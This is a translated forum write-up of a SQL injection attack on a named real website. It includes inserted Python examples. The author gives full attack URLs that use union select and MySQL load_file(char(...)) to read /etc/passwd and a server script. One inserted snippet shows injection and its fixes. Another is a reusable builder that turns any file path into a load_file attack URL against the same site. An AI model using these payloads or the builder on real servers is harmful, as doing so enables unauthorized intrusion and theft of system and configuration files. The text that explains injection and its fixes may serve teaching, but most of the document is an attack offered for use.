First of all, I would like to thank the legion for giving me such a good environment, one in which I can write some original articles of my own.
Cause:
I was told that CASI had passed 2.0 and was promised a vulnerable address, so, having nothing else to do, I tested it. I have been very depressed recently and could not keep studying; today I promised myself a good time studying PHP and seeing whether I could do anything with a website like this.
Process:
The address I was promised is http://www.gametea.com//showboard.php?id=282
A very standard PHP injection form, so we inject in the standard PHP way. First, append a single quote to the id parameter:
http://www.gametea.com/showboard.php?id=282'
[Screenshot 1: the error page]
The error page tells us two things: first, magic_quotes_gpc = off; second, the web path, /home/newgt/showboard.php.
Before submitting the statement, let's explain the principle of PHP injection with a small example. PHP injection is caused by insufficient filtering of variables.
Let's look at the following two SQL statements:
① SELECT * FROM article WHERE articleid='$id'
② SELECT * FROM article WHERE articleid=$id
Both forms are common in all kinds of programs, but their security differs. The first puts the variable $id inside a pair of single quotes, so whatever we submit becomes a string: even if it contains a well-formed SQL fragment, that fragment is not executed as SQL. The second is different: because the variable is not quoted, anything we submit that contains spaces is executed as SQL from the first space onward. Let's submit a malformed value to each and see the difference.
① Set $id to: 1' and 1=2 union select * from user where userid=1 /*
   The whole statement becomes: SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1 /*'
② Set $id to: 1 and 1=2 union select * from user where userid=1
   The whole statement becomes: SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1
See the difference? Because the first statement quotes the variable, we first have to close the preceding single quote so that the rest is parsed as SQL, and then comment out the single quote the program appends after the variable; only then does the injection succeed. If magic_quotes_gpc is on in php.ini, or the program passes the variable through addslashes() first, the quote we submit is escaped and the attack fails. The second statement never quotes the variable, so there is nothing to close or comment out and we simply submit the payload.
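To make the two forms concrete, here is an added example (not part of the original article, and not the gametea.com code): Python with an in-memory SQLite database stands in for PHP and MySQL, with constructed article and user tables. It shows the quoted form ① and the bare form ② each leaking the user row when fed the payloads above, and the two fixes that actually hold up: a bound parameter, and an intval()-style integer gate for a numeric id.

```python
import sqlite3

# Constructed stand-ins for the 'article' and 'user' tables of the two
# statements above; both have two columns so the UNION lines up.
SCHEMA = """
CREATE TABLE article (articleid INTEGER, title TEXT);
CREATE TABLE user (userid INTEGER, password TEXT);
INSERT INTO article VALUES (1, 'hello'), (2, 'world');
INSERT INTO user VALUES (1, 's3cret');
"""


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def query_quoted(db, user_id):
    # Form ①: $id pasted between single quotes by string concatenation.
    sql = "SELECT * FROM article WHERE articleid='%s'" % user_id
    return db.execute(sql).fetchall()


def query_unquoted(db, user_id):
    # Form ②: $id pasted in bare, so any space-separated SQL runs as SQL.
    sql = "SELECT * FROM article WHERE articleid=%s" % user_id
    return db.execute(sql).fetchall()


def query_bound(db, user_id):
    # Hardened form: a bound parameter is data and never becomes SQL syntax.
    sql = "SELECT * FROM article WHERE articleid=?"
    return db.execute(sql, (user_id,)).fetchall()


def coerce_id(user_id):
    # intval()-style gate for a numeric id: accept only a plain integer,
    # return None for anything else (so an injected payload never runs).
    s = str(user_id).strip()
    return int(s) if s.isdigit() else None


def query_intval(db, user_id):
    # PHP-era fix for numeric ids: cast first, then query with the integer.
    n = coerce_id(user_id)
    return [] if n is None else query_bound(db, n)


# Payload for ①: close the open quote, then comment out the quote the
# program appends after $id (the trailing /* swallows it).
PAYLOAD_QUOTED = "1' and 1=2 union select * from user where userid=1 /*"
# Payload for ②: no quote to close, nothing to comment out.
PAYLOAD_UNQUOTED = "1 and 1=2 union select * from user where userid=1"

if __name__ == "__main__":
    db = fresh_db()
    print(query_quoted(db, PAYLOAD_QUOTED))      # user row leaks
    print(query_unquoted(db, PAYLOAD_UNQUOTED))  # user row leaks
    print(query_bound(db, PAYLOAD_UNQUOTED))     # []
    print(query_intval(db, "1"))                 # [(1, 'hello')]
```

Run it directly to see the four results. SQLite does not treat a backslash as an escape inside string literals, so the magic_quotes_gpc/addslashes() case is deliberately not modelled here; the bound parameter and the integer cast are the fixes to copy.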
Now we submit the statement following angel's method: http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9
[Screenshot 2: the union select result]
The result shows that columns 7 and 9 are displayed as text, so they can show the contents of a file we read. Now we want to read files on the server. The web path tells us this box is UNIX, so our first target is the /etc/passwd file.
Various MySQL built-in functions can be used inside SQL statements. DATABASE(), USER(), SYSTEM_USER(), SESSION_USER() and CURRENT_USER() are commonly used to pull system information. Another widely used one is load_file(), which reads a file and returns its contents as a string.
So the obvious thing to do is read sensitive files, but there are restrictions:
- The file to be read must be on the server.
- The complete file path must be specified.
- You must have permission to read it, and the file must be readable in full.
- The file to be read must be smaller than max_allowed_packet
If the file does not exist or cannot be read for any of these reasons, the function returns NULL. The hardest condition to satisfy is permission: on Windows with properly set NTFS permissions the relevant files cannot be read, and a file readable only by administrators is not a candidate for load_file. On MySQL the database account also needs the FILE privilege, and newer versions confine load_file() to the directory named by secure_file_priv (NULL disables it entirely).
In an actual injection there are two difficulties to solve:
- The absolute physical path
- Constructing a valid malformed statement
In many PHP programs, when a bad query is submitted and display_errors = on, the program exposes the absolute path of the web directory. Once the path is known, an injectable PHP program puts the security of the whole server at serious risk. Constructing the statement itself needs no further explanation.
Here we use load_file(char(...)). We need to convert /etc/passwd into the list of character codes that char() takes (decimal ASCII values, so the payload needs no quote characters), and asc2chr does the conversion for us.
[Screenshot 3: asc2chr output]
This gives us the char() encoding of /etc/passwd.
The constructed statement is: http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1
This reads out the /etc/passwd file:
[Screenshot 4: the /etc/passwd contents]
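An added example (not from the original article or from asc2chr) of the conversion and URL construction in Python, generalized to any path and column layout. It assumes a 10-column union with column 7 displayed, as the screenshot of the union select result suggests; the base URL and id value are taken from the article.

```python
from urllib.parse import quote


def mysql_char(path):
    # What asc2chr produces: each byte of the path as a decimal code inside
    # char(), so the injected statement never needs a quote character.
    return "char(%s)" % ",".join(str(b) for b in path.encode())


def mysql_hex(path):
    # Equivalent quote-free form: a 0x hex literal, which MySQL also
    # accepts as the argument of load_file().
    return "0x" + path.encode().hex()


def build_load_file_url(base, id_value, column_count, display_col, path):
    # Counting-down column list as in the union select above; the column
    # the page renders as text is swapped for load_file(). Assumed here:
    # a 10-column query whose 7th column is displayed.
    cols = [str(n) for n in range(column_count, 0, -1)]
    cols[column_count - display_col] = "load_file(%s)" % mysql_char(path)
    payload = "%s and 1=2 union select %s" % (id_value, ",".join(cols))
    # Percent-encode spaces; keep the characters the SQL itself needs literal.
    return "%s?id=%s" % (base, quote(payload, safe=",()="))


if __name__ == "__main__":
    print(mysql_char("/etc/passwd"))
    print(mysql_hex("/etc/passwd"))
    print(build_load_file_url("http://www.gametea.com/showboard.php",
                              282, 10, 7, "/etc/passwd"))
```

Swap the path for any other file the server can read (the config file located later in the article, for instance) and the same function produces the URL; mysql_hex() is the shorter alternative when char() lists get long.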
Next we want to read the configuration file. Since we already have the web path, reading is easy; the same load_file() trick reads the script at the path the error page disclosed.
The constructed statement is: http://www.gametea.com//showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1